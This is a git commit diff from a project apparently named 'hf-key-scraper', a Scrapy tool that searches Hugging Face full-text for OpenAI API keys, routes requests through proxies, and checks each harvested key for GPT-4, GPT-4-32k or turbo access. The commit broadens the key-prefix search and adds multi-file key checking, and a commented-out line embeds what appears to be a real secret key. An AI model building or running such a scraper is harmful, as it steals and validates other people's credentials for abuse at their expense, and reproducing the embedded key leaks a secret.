final commit
This commit is contained in:
parent
15759586e4
commit
c13c224b36
|
@ -1,4 +1,6 @@
|
|||
.idea
|
||||
found-keys*.txt
|
||||
|
||||
|
||||
# ---> Python
|
||||
# Byte-compiled / optimized / DLL files
|
||||
|
|
|
@ -1,3 +1,5 @@
|
|||
# hf-key-scraper
|
||||
|
||||
Scrape for OpenAI keys on Hugging Face
|
||||
Scrape for OpenAI keys on Hugging Face.
|
||||
|
||||
This requires at least one Squid proxy to function. Define your proxies in `settings.py` -> `PROXIES`.
|
||||
|
|
|
@ -1,8 +1,9 @@
|
|||
import argparse
|
||||
import concurrent
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
from pathlib import Path
|
||||
|
||||
from tqdm import tqdm
|
||||
|
||||
from keychecker.check import check_key
|
||||
|
||||
|
||||
|
@ -17,26 +18,29 @@ def process_key(key):
|
|||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
|
||||
parser.add_argument('input_file', help='Path to the file containing the keys.')
|
||||
parser.add_argument('input_file', nargs='*', help='Path to the file containing the keys.')
|
||||
args = parser.parse_args()
|
||||
|
||||
input_file = Path(args.input_file).resolve().absolute()
|
||||
|
||||
keys = set()
|
||||
for file in args.input_file:
|
||||
input_file = Path(file).resolve().expanduser().absolute()
|
||||
if not input_file.exists():
|
||||
print('Input file does not exist:', input_file)
|
||||
quit(1)
|
||||
|
||||
with open(input_file) as f:
|
||||
content = set(f.read().splitlines())
|
||||
data = set(input_file.read_text().splitlines())
|
||||
keys = keys | data
|
||||
|
||||
# content = ['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']
|
||||
|
||||
print('Checking', len(keys), 'keys...')
|
||||
|
||||
gpt_4 = set()
|
||||
gpt_4_32k = set()
|
||||
gpt_3 = set()
|
||||
pbar = tqdm(total=len(keys))
|
||||
|
||||
with ThreadPoolExecutor(max_workers=50) as executor:
|
||||
results = executor.map(process_key, content)
|
||||
results = executor.map(process_key, keys)
|
||||
for result in results:
|
||||
if result is not None:
|
||||
if result['has_gpt_4']:
|
||||
|
@ -45,6 +49,8 @@ def main():
|
|||
gpt_4_32k.add(result['api_key'])
|
||||
if result['has_only_turbo']:
|
||||
gpt_3.add(result['api_key'])
|
||||
pbar.update(1)
|
||||
pbar.close()
|
||||
print('')
|
||||
|
||||
print('GPT4 KEYS:')
|
||||
|
|
|
@ -92,10 +92,7 @@ TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
|
|||
FEED_EXPORT_ENCODING = "utf-8"
|
||||
|
||||
PROXIES = [
|
||||
"http://172.0.4.7:3128",
|
||||
"http://172.0.4.8:3128",
|
||||
"http://172.0.4.10:3128",
|
||||
"http://172.0.4.12:3128",
|
||||
"http://127.0.0.1:3128"
|
||||
]
|
||||
|
||||
LOG_LEVEL = 'CRITICAL'
|
||||
|
|
|
@ -31,5 +31,5 @@ class HuggingfaceSpider(CrawlSpider):
|
|||
text = response.text
|
||||
matches = self.regex.findall(text)
|
||||
if matches:
|
||||
self.logger.error(f"{matches}")
|
||||
self.logger.debug(f"{matches}")
|
||||
return FoundItem(url=response.url, matches=matches)
|
||||
|
|
|
@ -4,14 +4,14 @@ import time
|
|||
|
||||
import coloredlogs
|
||||
import scrapy
|
||||
|
||||
from string import ascii_lowercase, ascii_uppercase
|
||||
from ..pipelines import FoundItem
|
||||
|
||||
|
||||
class HFSearchSpider(scrapy.Spider):
|
||||
name = "huggingface_search"
|
||||
allowed_domains = ["huggingface.co"]
|
||||
start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)]
|
||||
start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in [*ascii_lowercase, *ascii_uppercase, *range(10), 'etk', 'ant'] for j in range(10)]
|
||||
logger = logging.getLogger('HFSearchSpider')
|
||||
logger.setLevel(logging.DEBUG)
|
||||
coloredlogs.install(logger=logger, level=logging.DEBUG)
|
||||
|
@ -27,5 +27,5 @@ class HFSearchSpider(scrapy.Spider):
|
|||
for key in keys:
|
||||
found_keys.add(''.join(key))
|
||||
if len(found_keys):
|
||||
self.logger.error(f"{found_keys}")
|
||||
self.logger.debug(f"{found_keys}")
|
||||
yield FoundItem(url=response.url, matches=found_keys)
|
||||
|
|
Reference in New Issue